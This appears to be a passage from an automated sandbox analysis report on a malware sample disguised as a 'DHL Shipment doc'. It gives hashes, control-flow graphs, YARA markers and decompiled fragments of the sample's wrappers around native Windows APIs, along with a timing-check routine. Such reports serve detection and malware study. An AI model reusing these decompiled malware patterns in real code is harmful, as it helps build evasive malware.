                              • Opcode Fuzzy Hash: 1f0b2b6368d35f4ae524cc39d5e4d23b71e64d9e3ecf034675f82a68034fa19f
                              • Instruction Fuzzy Hash: 032116B59002089FDB10CFA9D884ADEBBF8FB48324F14845AE918B3350C378A944DFA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 219 190c798-190c82c DuplicateHandle 221 190c835-190c852 219->221 222 190c82e-190c834 219->222 222->221
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0190C81F
                              Memory Dump Source
                              • Source File: 00000000.00000002.692690674.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1900000_DHL Shipment doc.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: bf200dc92e2c6117069ab5b748361e620fe70227f54ded703eb8ee19bd52db77
                              • Instruction ID: 4310d31950711b2085d28268d72016b417a5d319fa75c73c0843a6b2cc0e17a8
                              • Opcode Fuzzy Hash: bf200dc92e2c6117069ab5b748361e620fe70227f54ded703eb8ee19bd52db77
                              • Instruction Fuzzy Hash: 6221D8B5D002499FDB10CF99D984ADEFBF8FB48324F14855AE914A3350D374A944CFA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 225 190a6e9-190a730 227 190a732-190a735 225->227 228 190a738-190a767 LoadLibraryExW 225->228 227->228 229 190a770-190a78d 228->229 230 190a769-190a76f 228->230 230->229
                              APIs
                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0190A549,00000800,00000000,00000000), ref: 0190A75A
                              Memory Dump Source
                              • Source File: 00000000.00000002.692690674.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1900000_DHL Shipment doc.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: cc2496f7bb364c53083687c189414823771272c8386c9a1ac90ee7d2175738a8
                              • Instruction ID: 45147fdf40c7300c4949acfb73698e0c04514dcdd621028a84e2885bf6a7f81c
                              • Opcode Fuzzy Hash: cc2496f7bb364c53083687c189414823771272c8386c9a1ac90ee7d2175738a8
                              • Instruction Fuzzy Hash: 5B2117B6C003099FDB20CFAAD884BDEFBF4EB88314F15851AE419A7600C379A545CFA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 233 19095e0-190a730 236 190a732-190a735 233->236 237 190a738-190a767 LoadLibraryExW 233->237 236->237 238 190a770-190a78d 237->238 239 190a769-190a76f 237->239 239->238
                              APIs
                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0190A549,00000800,00000000,00000000), ref: 0190A75A
                              Memory Dump Source
                              • Source File: 00000000.00000002.692690674.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1900000_DHL Shipment doc.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: 3402ddd229d50529e1ed5fb32c348ebfd72c824fe8807fa6977d6d280b3437de
                              • Instruction ID: 0da85b7d9ab0f4b02657844ef858768f89103d414b10f34cff19c4a981926fb7
                              • Opcode Fuzzy Hash: 3402ddd229d50529e1ed5fb32c348ebfd72c824fe8807fa6977d6d280b3437de
                              • Instruction Fuzzy Hash: 8E1117B6D003099FDB10CF9AC844BDEFBF8EB88324F15842AE519A7240C374A545CFA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 242 190a790-190a79c 244 190a72e-190a730 242->244 245 190a79e-190a7ad 242->245 247 190a732-190a735 244->247 248 190a738-190a767 LoadLibraryExW 244->248 251 190a7b4-190a7c0 245->251 252 190a7af-190a7b3 245->252 247->248 249 190a770-190a78d 248->249 250 190a769-190a76f 248->250 250->249 256 190a7c2-190a7c9 251->256 257 190a7ca-190a7df call 1909598 251->257
                              APIs
                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0190A549,00000800,00000000,00000000), ref: 0190A75A
                              Memory Dump Source
                              • Source File: 00000000.00000002.692690674.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1900000_DHL Shipment doc.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: 0cd97a92840aca24fd64d59e0fc1a2b2ec76ff07a237c1073bd3b2787b65bc7a
                              • Instruction ID: 97b70ef3ded2c32fea21b3c7aeb77c9005e1dca5f15c3eaf7660db95c49efe90
                              • Opcode Fuzzy Hash: 0cd97a92840aca24fd64d59e0fc1a2b2ec76ff07a237c1073bd3b2787b65bc7a
                              • Instruction Fuzzy Hash: 3F1100B6D003048FDB11CFA9D8047DABBF8EF85325F00805AE219E7240C379A805CFA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 261 190a468-190a4a8 262 190a4b0-190a4db GetModuleHandleW 261->262 263 190a4aa-190a4ad 261->263 264 190a4e4-190a4f8 262->264 265 190a4dd-190a4e3 262->265 263->262 265->264
                              APIs
                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0190A4CE
                              Memory Dump Source
                              • Source File: 00000000.00000002.692690674.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1900000_DHL Shipment doc.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: 1d3462b8202129758206265ceac4a647224bced31bba0254794c0124916bd7da
                              • Instruction ID: e19d4527ae6009ce2955eb1024514ab17ac59afe1bd47ec13fff10f8b9f9da6c
                              • Opcode Fuzzy Hash: 1d3462b8202129758206265ceac4a647224bced31bba0254794c0124916bd7da
                              • Instruction Fuzzy Hash: 151113B5C003498FDB10CF9AC444BDEFBF8AB88224F11841AD419A7600C378A545CFA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.692690674.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1900000_DHL Shipment doc.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c0dd0e2deb3dad2e4083de82d5251e4798916b0989b16f80d8f0426272b9471e
                              • Instruction ID: 9b3d209424213da9823db4e5eabf4dcdb3a9f7a12370e3dacc888b0783798841
                              • Opcode Fuzzy Hash: c0dd0e2deb3dad2e4083de82d5251e4798916b0989b16f80d8f0426272b9471e
                              • Instruction Fuzzy Hash: 6812B8F14917468BD310EF65F69C1893BA1F7E6328F70C289D2611BAD9DBB8114ACF84
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.692690674.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1900000_DHL Shipment doc.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 08ba2fbe5c0c08d835caf814fe1a285726949a35f9b2edafdea9d0c506940a83
                              • Instruction ID: 5f9f10d87ab376b68cd4b833650e5dad9479c3dca16d5809fc6cc0289b185e05
                              • Opcode Fuzzy Hash: 08ba2fbe5c0c08d835caf814fe1a285726949a35f9b2edafdea9d0c506940a83
                              • Instruction Fuzzy Hash: 95A19132E0061ACFCF06DFB5C9445DEBBB6FF84301B15856AE909BB265EB31A945CB40
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.692690674.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1900000_DHL Shipment doc.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e908b4463019990ad79f7b99da9fde3e1aa721625ff7301feb37b67ef0c6c723
                              • Instruction ID: 9d9ab5a6988eead35478578e5f5c119513c66304d2f8a36264141977e265530d
                              • Opcode Fuzzy Hash: e908b4463019990ad79f7b99da9fde3e1aa721625ff7301feb37b67ef0c6c723
                              • Instruction Fuzzy Hash: 04C1F9B14517458BD710EF65FA8C1893B71FBE6328F708289D2612BAD8DFB8114ACF94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Execution Graph

                              Execution Coverage:9.1%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:3.1%
                              Total number of Nodes:678
                              Total number of Limit Nodes:74

                              Control-flow Graph

                              C-Code - Quality: 37%
                              			E00418642(void* __edi) {
                              
                              				_pop(ss);
                              				asm("adc bl, [0x29bbc9f1]");
                              				_t1 = __edi + 0x5e;
                              				 *_t1 =  *((char*)(__edi + 0x5e)) - 1;
                              				asm("ficomp dword [ebp+0x1e]");
                              				if ( *_t1 < 0) goto L3;
                              			}




                              APIs
                              • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_DHL Shipment doc.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileRead
                              • String ID: *9A$A:A
                              • API String ID: 2738559852-3393056465
                              • Opcode ID: 4810ea6e2f94facf85988b5b29332e51c1bc3a2305cc6e82dcbacff4f6941baf
                              • Instruction ID: 8e57b21a112ab31d7c6b1d6ba0543481a0f6967f1ae2cad0eacb54953c2498bd
                              • Opcode Fuzzy Hash: 4810ea6e2f94facf85988b5b29332e51c1bc3a2305cc6e82dcbacff4f6941baf
                              • Instruction Fuzzy Hash: FF21E0B2204109ABDB18DF99DC94EEB77A9AF8C354F158249FA0DA7241C634E851CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              control_flow_graph 11 41869a-4186e9 call 4191f0 NtReadFile
                              APIs
                              • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_DHL Shipment doc.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileRead
                              • String ID: A:A
                              • API String ID: 2738559852-2859176346
                              • Opcode ID: 40b671ccacba2d23a778ba0ee767292e06d283ac9816c1099dbc126ef6d10228
                              • Instruction ID: 1628b4857647c982ed4431088c360b56197b574895956c7edaea39bee45bd8c3
                              • Opcode Fuzzy Hash: 40b671ccacba2d23a778ba0ee767292e06d283ac9816c1099dbc126ef6d10228
                              • Instruction Fuzzy Hash: 6AF0F4B2200108ABCB14DF99DC80EEB77ADAF8C354F058249FE1D97241C630E851CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              control_flow_graph 16 4186a0-4186e9 call 4191f0 NtReadFile
                              C-Code - Quality: 37%
                              			E004186A0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
                              				intOrPtr _t13;
                              				void* _t18;
                              				void* _t27;
                              				void* _t28;
                              				intOrPtr* _t29;
                              
                              				_t13 = _a4;
                              				_t29 = _t13 + 0xc48;
                              				E004191F0(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                              				_t4 =  &_a40; // 0x413a41
                              				_t18 =  *((intOrPtr*)( *_t29))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4, _t28); // executed
                              				return _t18;
                              			}









                              APIs
                              • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_DHL Shipment doc.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileRead
                              • String ID: A:A
                              • API String ID: 2738559852-2859176346
                              • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                              • Instruction ID: f080bec4c040545e3dab2a82d2c0628179b57ce59769f180118a0d9c745142a3
                              • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                              • Instruction Fuzzy Hash: 84F0A4B2200208ABDB14DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              control_flow_graph 233 409b50-409b6c 234 409b74-409b79 233->234 235 409b6f call 41af80 233->235 236 409b7b-409b7e 234->236 237 409b7f-409b8d call 41b3a0 234->237 235->234 240 409b9d-409bae call 419730 237->240 241 409b8f-409b9a call 41b620 237->241 246 409bb0-409bc4 LdrLoadDll 240->246 247 409bc7-409bca 240->247 241->240 246->247
                              C-Code - Quality: 100%
                              			E00409B50(void* __eflags, void* _a4, intOrPtr _a8) {
                              				char* _v8;
                              				struct _EXCEPTION_RECORD _v12;
                              				struct _OBJDIR_INFORMATION _v16;
                              				char _v536;
                              				void* _t15;
                              				struct _OBJDIR_INFORMATION _t17;
                              				struct _OBJDIR_INFORMATION _t18;
                              				void* _t30;
                              				void* _t31;
                              				void* _t32;
                              
                              				_t24 = _a8;
                              				_v8 =  &_v536;
                              				_t15 = E0041AF80( &_v12, 0x104, _a8);
                              				_t31 = _t30 + 0xc;
                              				if(_t15 != 0) {
                              					_t17 = E0041B3A0(_v8, _t24, __eflags, _v8);
                              					_t32 = _t31 + 4;
                              					__eflags = _t17;
                              					if(_t17 != 0) {
                              						E0041B620( &_v12, 0);
                              						_t32 = _t32 + 8;
                              					}
                              					_t18 = E00419730(_v8);
                              					_v16 = _t18;
                              					__eflags = _t18;
                              					if(_t18 == 0) {
                              						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                              						return _v16;
                              					}
                              					return _t18;
                              				} else {
                              					return _t15;
                              				}
                              			}














                              APIs
                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                              Memory Dump Source
                              • Source File: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_DHL Shipment doc.jbxd
                              Yara matches
                              Similarity
                              • API ID: Load
                              • String ID:
                              • API String ID: 2234796835-0
                              • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                              • Instruction ID: 5a8ad600e2bb26a3f9256955bcf7627a7477e6013f8e9ac5f1feb4612366a355
                              • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                              • Instruction Fuzzy Hash: 3A0152B5D0010DA7DB10DAA1DC42FDEB378AB54308F0041A9E918A7281F634EB54CB95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              control_flow_graph 248 4185ea-418641 call 4191f0 NtCreateFile
                              C-Code - Quality: 82%
                              			E004185EA(void* __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                              				intOrPtr _v117;
                              				long _t23;
                              				void* _t34;
                              
                              				asm("adc eax, 0x58aa322c");
                              				_v117 = _v117 + __edx;
                              				_t17 = _a4;
                              				_t5 = _t17 + 0xc40; // 0xc40
                              				E004191F0(_t34, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                              				_t23 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                              				return _t23;
                              			}







                              APIs
                              • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                              Memory Dump Source
                              • Source File: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_DHL Shipment doc.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: 317a2c0b203aebd36da3fa286c0a94b2c6ad7ddb797753bcf1bbf841c9892b18
                              • Instruction ID: 4f0e49c2477b0657c67c2fec6e7e8f619a0fbfa7b88b330f09787f3110a3306a
                              • Opcode Fuzzy Hash: 317a2c0b203aebd36da3fa286c0a94b2c6ad7ddb797753bcf1bbf841c9892b18
                              • Instruction Fuzzy Hash: EF01AFB2610208BFCB48CF98DC95EEB77A9AF8C754F158249FA0DD7241D630E855CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              control_flow_graph 251 4185f0-418606 252 41860c-418641 NtCreateFile 251->252 253 418607 call 4191f0 251->253 253->252
                              C-Code - Quality: 100%
                              			E004185F0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                              				long _t21;
                              				void* _t31;
                              
                              				_t3 = _a4 + 0xc40; // 0xc40
                              				E004191F0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                              				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                              				return _t21;
                              			}






                              APIs
                              • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                              Memory Dump Source
                              • Source File: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_DHL Shipment doc.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                              • Instruction ID: 6e88bdc2a8d45a62887e6f3ef0105f77e511591ccf53121fd16df0132ea8aa9a
                              • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                              • Instruction Fuzzy Hash: 17F0BDB2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              control_flow_graph 254 4187cb-41880d call 4191f0 NtAllocateVirtualMemory
                              C-Code - Quality: 82%
                              			E004187CB(intOrPtr __eax, void* __edi, intOrPtr _a2, void* _a6, PVOID* _a10, long _a14, long* _a18, long _a22, long _a26) {
                              				long _t18;
                              
                              				_push(__edi);
                              				 *((intOrPtr*)(__edi - 0x1374aad6)) = __eax;
                              				_t14 = _a2;
                              				_t5 = _t14 + 0xc60; // 0xca0
                              				E004191F0(__edi, _a2, _t5,  *((intOrPtr*)(_a2 + 0x10)), 0, 0x30);
                              				_t18 = NtAllocateVirtualMemory(_a6, _a10, _a14, _a18, _a22, _a26); // executed
                              				return _t18;
                              			}





                              APIs
                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                              Memory Dump Source
                              • Source File: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_DHL Shipment doc.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID:
                              • API String ID: 2167126740-0
                              • Opcode ID: fa9595a296a7c1b530e0e5178a9c926aa6abdc6992919f3d8a3cc550fb1eedaf
                              • Instruction ID: 6f81bef43f40118dec1e844ade3b44a3cf3814683958c0aa511ea7938e4bdb01
                              • Opcode Fuzzy Hash: fa9595a296a7c1b530e0e5178a9c926aa6abdc6992919f3d8a3cc550fb1eedaf
                              • Instruction Fuzzy Hash: ABF01CB2200159AFDB14DF89CC95EE777A9FF8C354F158549FE5997241C630E810CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              control_flow_graph 257 4187d0-4187e6 258 4187ec-41880d NtAllocateVirtualMemory 257->258 259 4187e7 call 4191f0 257->259 259->258
                              C-Code - Quality: 100%
                              			E004187D0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                              				long _t14;
                              				void* _t21;
                              
                              				_t3 = _a4 + 0xc60; // 0xca0
                              				E004191F0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                              				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                              				return _t14;
                              			}






                              APIs
                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                              Memory Dump Source
                              • Source File: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_DHL Shipment doc.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID:
                              • API String ID: 2167126740-0
                              • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                              • Instruction ID: 706794cddc655a9f1cf9aa3041d650f47f408424a1237cb237646820d67af729
                              • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                              • Instruction Fuzzy Hash: C6F015B2200208ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F810CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00418720(intOrPtr _a4, void* _a8) {
                              				long _t8;
                              				void* _t11;
                              
                              				_t5 = _a4;
                              				_t2 = _t5 + 0x10; // 0x300
                              				_t3 = _t5 + 0xc50; // 0x409773
                              				E004191F0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                              				_t8 = NtClose(_a8); // executed
                              				return _t8;
                              			}






                              APIs
                              • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                              Memory Dump Source
                              • Source File: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_DHL Shipment doc.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close
                              • String ID:
                              • API String ID: 3535843008-0
                              • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                              • Instruction ID: 78d7ac03eca040244b58aa8b13355d71f7060bfbe0c396a3df5df4df45d4e392
                              • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                              • Instruction Fuzzy Hash: D4D01776200218BBE710EF99CC89EE77BACEF48760F154499BA189B242C530FA4086E0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E004088E0(intOrPtr* _a4) {
                              				intOrPtr _v8;
                              				char _v24;
                              				char _v284;
                              				char _v804;
                              				char _v840;
                              				void* _t24;
                              				void* _t31;
                              				void* _t33;
                              				void* _t34;
                              				void* _t39;
                              				void* _t50;
                              				intOrPtr* _t52;
                              				void* _t53;
                              				void* _t54;
                              				void* _t55;
                              				void* _t56;
                              
                              				_t52 = _a4;
                              				_t39 = 0; // executed
                              				_t24 = E00406E30(_t52,  &_v24); // executed
                              				_t54 = _t53 + 8;
                              				if(_t24 != 0) {
                              					E00407040( &_v24,  &_v840);
                              					_t55 = _t54 + 8;
                              					do {
                              						E0041A100( &_v284, 0x104);
                              						E0041A770( &_v284,  &_v804);
                              						_t56 = _t55 + 0x10;
                              						_t50 = 0x4f;
                              						while(1) {
                              							_t31 = E00413E00(E00413DA0(_t52, _t50),  &_v284);
                              							_t56 = _t56 + 0x10;
                              							if(_t31 != 0) {
                              								break;
                              							}
                              							_t50 = _t50 + 1;
                              							if(_t50 <= 0x62) {
                              								continue;
                              							} else {
                              							}
                              							goto L8;
                              						}
                              						_t9 = _t52 + 0x14; // 0xffffe1a5
                              						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                              						_t39 = 1;
                              						L8:
                              						_t33 = E00407070( &_v24,  &_v840);
                              						_t55 = _t56 + 8;
                              					} while (_t33 != 0 && _t39 == 0);
                              					_t34 = E004070F0(_t52,  &_v24); // executed
                              					if(_t39 == 0) {
                              						asm("rdtsc");
                              						asm("rdtsc");
                              						_v8 = _t34 - 0 + _t34;
                              						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                              					}
                              					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                              					_t20 = _t52 + 0x31; // 0x5608758b
                              					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                              					return 1;
                              				} else {
                              					return _t24;
                              				}
                              			}




















                              Memory Dump Source
                              • Source File: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_DHL Shipment doc.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 8 418970-4189c8 call 4191f0 CreateProcessInternalW
                              C-Code - Quality: 37%
                              			E00418970(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, char _a48, intOrPtr _a52) {
                              				void* _t22;
                              				void* _t33;
                              				intOrPtr* _t34;
                              
                              				_t16 = _a4;
                              				_t2 = _t16 + 0xa14; // 0x58de852
                              				_t3 = _t16 + 0xc80; // 0x408929
                              				_t34 = _t3;
                              				E004191F0(_t33, _a4, _t34,  *_t2, 0, 0x37);
                              				_t5 =  &_a48; // 0x407c65
                              				_t22 =  *((intOrPtr*)( *_t34))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44,  *_t5, _a52); // executed
                              				return _t22;
                              			}







                              APIs
                              • CreateProcessInternalW.KERNELBASE(00407C3D,00407C65,004079FD,00000010,?,00000044,?,?,?,00000044,e|@D,00000010,004079FD,00407C65,00407C3D,00407CA9), ref: 004189C4
                              Strings
                              Yara matches
                              Similarity
                              • API ID: CreateInternalProcess
                              • String ID: e|@D
                              • API String ID: 2186235152-4053762965
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 20 4188c0-4188f1 call 4191f0 RtlAllocateHeap
                              C-Code - Quality: 100%
                              			E004188C0(intOrPtr _a4, char _a8, long _a12, long _a16) {
                              				void* _t10;
                              				void* _t15;
                              
                              				E004191F0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                              				_t6 =  &_a8; // 0x413546
                              				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                              				return _t10;
                              			}






                              APIs
                              • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED
                              Strings
                              Yara matches
                              Similarity
                              • API ID: AllocateHeap
                              • String ID: F5A
                              • API String ID: 1279760036-683449296
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
